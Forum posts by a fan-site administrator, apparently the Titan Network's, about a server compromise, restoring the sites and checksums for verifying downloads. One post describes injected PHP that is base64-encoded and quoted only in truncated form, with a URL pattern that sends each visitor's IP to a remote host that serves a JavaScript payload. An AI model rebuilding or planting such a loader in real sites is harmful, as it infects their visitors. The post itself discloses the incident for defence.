TonyV
-
Posts
1977 -
Joined
-
Quote:It's not dead; I'm working on getting it restored to how it was. I will be honest, though, in saying that I don't plan on any significant updates or features to be added. We're working on a revamp, though, that will make a lot of this functionality kind of obsolete.Originally Posted by Blackops3lite
No more coh faces?
In the meantime, I'm trying to knock out the other things on my To Do list so that we don't unnecessarily delay getting other functionality up and running. It's going to be at least next week before it even might be up. This is also why I haven't posted any updates in the last couple of days or so. The things I've been working on have been back-end stuff like getting log rotation working, getting our development repositories set up, and fixing minor bugs like the OuroPortal image database, the CIT XML feed, etc.
This week, I'm going to try to get our stat tracking working again, and then this coming weekend, I'm going to the pummit. If you have comments, be they glowing compliments or scathing cuss-outs, you can meet me in person in Mountain View and have at it.
This is a known issue due to the recent UI change. GuyPerfect is working on an update. Because the UI changed and not just the data contained with it, it's going to require an application upgrade to fix it, not just an automagic manifest download. It will be fixed soon. (Not Soon™, which is the status of Faces.Quote:Originally Posted by Blue Rabbit
My Sentinel doesn't even detect that the game is running. Kind of hard to have it verify badges that way.
)
-
Thanks for the report. There's definitely something wonky with the shared repository. I'll take a look at it.
-
Quote:Tap the End key or use the scroll wheel to zoom out a hair.Originally Posted by Ang_Rui_Shen
The camera is high enough that you can't get a large full-character screenshot; if the rest of the character is the right size, the legs are cut off.
-
Hey all, quick update. The Ouroboros Portal is back up. It's been cleaned, upgraded, and secured. Sorry for the delay in updates. Now on to the next items in my to do list. If anyone has any trouble or gets any errors, let me know.
-
Quote:You're the Guy.Originally Posted by GuyPerfect
I wanna be the man too!
-
Quote:This will probably be a not-too-hard thing to do, so I'll try to get it up and running mid-evening tonight. Faces is by far the hardest one to get moved over, that one will probably be at least another day or two out.Originally Posted by Obsidius
I've been talking about OuroPortal lately and was wondering what its order on the totem poll is. Obviously not a critical issue, just curious
-
Hey all, RedTomax/City of Data is back online and accessible. This one wasn't too hard, especially being a static site. It's cleaned and back up for your enjoyment. Please note that the RSS feeds are grossly out-of-date and don't work; that's not a new bug or a result of the cleaning or upgrades; it was broken a long time ago, and my focus is currently restoring the functionality we had, not fixing bugs that existed before. Also note that the data isn't up-to-date, either. Getting it up-to-date is another effort that will be addressed later.
-
Hmm... Good question. If it's based on the CodeIgniter framework, it will probably be tomorrow or, at the latest, Wednesday. If it's not, I'll try to get it restored tonight. I don't think it is, so I'm hoping the latter.
-
You were watching the football game, weren't you! And no, I'm not trying to make a joke about the cheerleader outfit. I just mean that that is the only thing I've watched today, and I saw the same commercial.
-
Woot, we have site uppage! Please read the update at the top for more info.
tl;dr version: CIT, avatars, and the Mids' and Sentinel repository are all up now, report any issues here!
-
Quote:You bet. It is:Originally Posted by The_Spad_EU
TonyV, any chance you could post the MD5 for the current Mids' installer, just so that anyone who wants to can check it against the one they download off my server?
I'm sure most people won't care, but I'd like to provide the option for those who do.
Ta.
fd8f4946e53ef9a466674f4f160b0eb7 MXDSetup1-952.exe
I've run both the latest version that was posted on our site and the version that is mirrored above through a checksum, and compared it to a known good version that I had from Diellan's and DeProgrammer's updates to the repository, and they all match up.
For anyone who wants to verify the integrity of their file, they can snag a copy of a file checksummer utility from Microsoft from their web site.
If you want to verify that your installed copy of Mids is okay, here's the checksum of executable files within the distribution:
47f54527bc44c4dc98845da86e7387b0 Hero Designer.exe
0b3b4e8d1de31f844e466d61cf7937b5 ICSharpCode.SharpZipLib.dll
e1ee2d27c6f6f105a7ba21387e1cbf07 midsControls.dll
80e41408f6d641dc1c0f5353a0cc8125 zlib1.dll
d993e1da5d1c5cda8d8daa096eecced4 Uninstall.exe
Just to stress the point: The Mids download was not compromised on the site. Barring infection in some other manner, downloading Mids, installing it, and running it would not have affected your computer. -
Just a quick update that we're keeping the sites down for another day while we plug the hole we've identified as the likely exploit vector. We have strong reason to believe that this was the butt-kicker. We found a "smoking gun" in the Faces filesystem, along with some other oddities that we're using for diagnostic and research purposes. Needless to say, we're going to be patching every installation of CodeIgniter we have before turning stuff back on.
Note that the sites that are currently up, which include our forums, the Paragon Wiki, and HeroStats site, do not use CodeIgniter and are not vulnerable to the attack that was used. Also, we've significantly locked down the permissions on the directories so that even the web service account doesn't have write access to pull off this kind of thing again.
As a side effect, to be honest, there might be a few glitches because scripts don't have the same access to the system that they used to. If you notice any oddities or get any errors, let us know and we'll try to get them fixed. -
This is kind of odd, and I wanted to address it before any rumors spread too far or wide, especially given our activities this week. Someone PMed me today that there was chatter in-game that the Paragon Wiki is going to shut down in a year, according to the guy that created it. I don't know who they were referring to, but in reality, that would be me. I started the site, I currently own all of the domains associated with the Titan Network, and I am the lessee of the server on which all Titan Network sites--including the Paragon Wiki--reside.
The truth of the matter is that this has never even been mentioned in passing as a topic of conversation. Not by me, not among any of our admins. I have no idea where someone may have gotten this idea, but it is 100% not true. If I put some gray matter to it, I could probably contrive some bizarre circumstances under which the sites might not still be up in a year (or two, or five, or twenty...), but it's never really occurred to me to try.
Either someone's making stuff up to have a good laugh on folks, or there was a really bizarre misunderstanding. Maybe someone was talking about another site or something, I don't know. I haven't heard of any other sites that are worried about shutting down.
So if you see anyone making this odd claim, please point them to this thread, or just tell them to search for TonyV's post with the word cwm in it, a Welsh word for a bowl-like valley (and an awesome play to make your opponent challenge your word and snag you an extra turn in Scrabble), and which I will only use in this post in order to make it easy to find via a quick search.
Okay, now that that is taken care of, I'm going to go play my crwth for a while. -
Quote:Now now, don't go guilting people into donating.Originally Posted by Obsidius
If you haven't donated to the Titan Network yet, I don't know why TonyV and the gang are busting their humps for you (and using vacation time to do it, too!) Especially since...
If I were getting paid for this, I'd like to hope that I would have done a better job of making sure all of our software was up-to-date, possibly preventing this whole mess to begin with. Truth be known, I'm feeling a bit guilty over it, since keeping current is normally a big emphasis of mine to maintain security of the system.Quote:Originally Posted by Demobot
I'd love to see people who get PAID to do this sort of thing do a better job than TonyV has. Keep up the good work Tony!
Still, things have been pretty crazy on all fronts at the Titan Network lately, what with changes to the game coming fast and furious. Everyone loves the pace at which new stuff is coming out these days--including us!--but I won't lie, sometimes it's like, "Aw, come on guys! Give us some time to breathe!"
So I admit it, I let something slip that really shouldn't have slipped, and we got bitten for it. For anyone else running a web site out there, whether it's a hobby like this one or a more professional endeavor, I can't pound this into your skull enough. Make sure you stay on top of patches and updates! Not just the big stuff like the OS, web server, database, and scripting language (though those are certainly important), but also every library, packaged software, and coding framework you use, too.
Incidentally, that's also one thing we'll be working on, is making sure that only our live, up-to-date sites are hosted on the server. No more development stuff, and no more deprecated sites. Keeping the dozens of things in the live environment current is hard enough without having to worry about a development site being hacked; it doesn't make sense to needlessly expose ourselves because that old forgotten copy of the PC Free Press that no one looks at is still hanging out there using an ancient version of Mambo. We'll still have dev and test sites, probably hosted on VMs at my house, and I'll try to host those old deprecated sites somewhere (possibly on a dirt cheap shared web host or something), but not where it could compromise our active sites. -
Upon learning of this news, Snaptooth responded:
(Okay, I'll stop now.)
-
Quote:Originally Posted by Zwillinger
There's currently some issues with the Hero (blue) skin on the forums.
We sincerely hope it gets corrected quickly. -
First of all, I have to say a HUGE "Thank you!" to everyone expressing support. As I've said before, it really does mean a lot. These things are very NOT fun to deal with, and I appreciate everyone bearing with us and sending good vibes our way as we not only restore service, but actually make things better. Some folks have even been sending donations, which I really appreciate, since we're double-dipping on a second VPS this month to have the ability to move audited stuff over as it gets cleaned and verified instead of trying to move everything at once and clean-as-we-go. I've also been getting some PMs from folks, and I will reply, I promise, as soon as the sites are back up and I can take some time to do it right.
Second of all, as posted in the update in the OP, we got the Titan Forums updated and restored. There are still some login/password issues so you might not have full access just yet, but when we get the main site back up (expected sometime tomorrow night Eastern time), you'll be able to reset your Titan Key to sync everything up and regain access. I'll post more details as I get them.
Quote:I'm almost certain this is what bit us. I'm not 100% sure, and I'm still looking for the "smoking gun" on the server to definitively say, "Yup, that's it!" (Which will really have to wait at least another day or two until I get everything moved over, configured, and up and running.) But of what research I've been able to do, this is by far the most likely candidate vector of attack. It's also why I put such heavy emphasis on getting the old forums upgraded first, even at the expense of losing some of the customization.Originally Posted by SaintNicster
Yeah, I'm guessing that it was probably something with the copy of SMF. Last I saw, it was running 1.1.10, though there may have been more components that were up-to-date. -
Quote:Memento: The MMORPG.Originally Posted by peterpeter
I think they also need to fix the bug which causes text to come out in random order. Unless it's just me, but it seems like a lot of spawns that are supposed to have some dialog get the lines in the wrong order.
-
Quote:It's DNS propagation. We changed the IP address of the server, so until your DNS server updates with the new address, you'll still be hitting against the old server that's not servicing requests. The TTL is a day, but really, it shouldn't take that long. I noticed around 15 minutes ago that it had just hit Google's public DNS servers, so it is getting out there.Originally Posted by QuarriosSoul
The paragonwiki.com link isn't working but the wiki.cohtitan.com one is.
-
Quote:Absolutely. Anyone with NoScript installed is literally at zero risk of being affected by this. (Unless you've whitelisted the malware domain, which I really hope you haven't.Originally Posted by Intrinsic
I take it from your description that a browser plugin like Noscript would block the javascript payload from running, even if the plugin allows scripts from the cohtitan.com domain to execute, correct?) Whitelisting the cohtitan.com sites is fine, also, the payload was delivered by a remote server, not the Titan server.
-
Quote:/e nooooOriginally Posted by Ideon
You could always visit the wikia version... derp :3
-
Quote:Muchas gracias. I read it, and I'll process it as soon as I can. Sounds reasonable to me. I did check the cron jobs earlier and I don't see anything, but I still haven't finished a deep dive to find out what did make the changes. That's way up the priority chain on my list, after getting at least a maintenance page deployed.Originally Posted by CuppaManga
Based on your analysis, TonyV, I sent you a PM that I hope will get you out of the woods.
-
That's one of the things that we have to check to make sure it's clean before bringing everything back up. I'll try to get someone on checking the downloadable copy of Mids to make sure it wasn't compromised and posting it back up for download shortly.
-
Quote:The nuts and bolts of it is that something has rewritten a whole bunch of index.php files, including most that run the core functionality of all of our sites, to include the following line at the top:Originally Posted by gameboy1234
If you can, post some analysis of what the attacker did. I'm always interested to see these things explained. Helps the rest of us with our security.
echo (base64_decode('ZXJy[bunches more gibberish]0KfQ=='));
When you decode that, you get a Php function that:
- Turns off error reporting,
- Fetches the IP address of who's accessing the page,
- Fetches the user agent (UA) of who's accessing the page and compares it against a list of known security sites and webcrawlers,
- If it's not in the list of UAs, it does a cURL fetch of a javascript payload from a remote distribution site. The URL is defined as:
'http://[scum domain omitted]/index.php?go=1&ip='.$ip
So it's sending the user who is accessing the page's IP address. Depending on that IP address, they payload may or may not be delivered. When I put my own address in, it's not. When I poked around a little bit, I was able to find an IP that did deliver the payload, which I copied for further analysis as soon as I get a chance.
There are a couple of interesting things that I'm trying to figure out. For one thing, the modification datestamps of the index.php files are unchanged. That means that whatever script made the modifications either 1) is running at a very low-level filesystem level, or 2) took some pains to save the modification date and change it back to what it was originally.
Right now, my efforts are being split in three directions. First, I'm on shift for my day job and, as my luck is going today, got sucked into a teleconference as soon as I logged on two hours ago, which means that my other efforts are currently being severely hampered. Second, I'm setting up a second server that will likely replace our existing Titan Network server that has been completely staged from scratch and onto which sanitized copies of our sites will be moved. Third, I'm trying to get to the bottom of how this happened so that I can prevent it from happening again and, if possible, report the incident to law enforcement. -
Quote:With that profile, I wouldn't think so. The full scan certainly won't hurt though, and I would recommend that anyone who has visited the sites in the past 18 hours or so (since around 17:00 ET/21:00 UTC) to run a scan just in case.Originally Posted by Twoflower
I want to avoid rumor/scaremongering, but what does this mean for someone who just visited the site during the compromised period? Should I be worrying about viruses?
I run ZoneAlarm, AVG Free, and am using Firefox, if that helps. I'm gonna start a full computer scan right now, to be sure.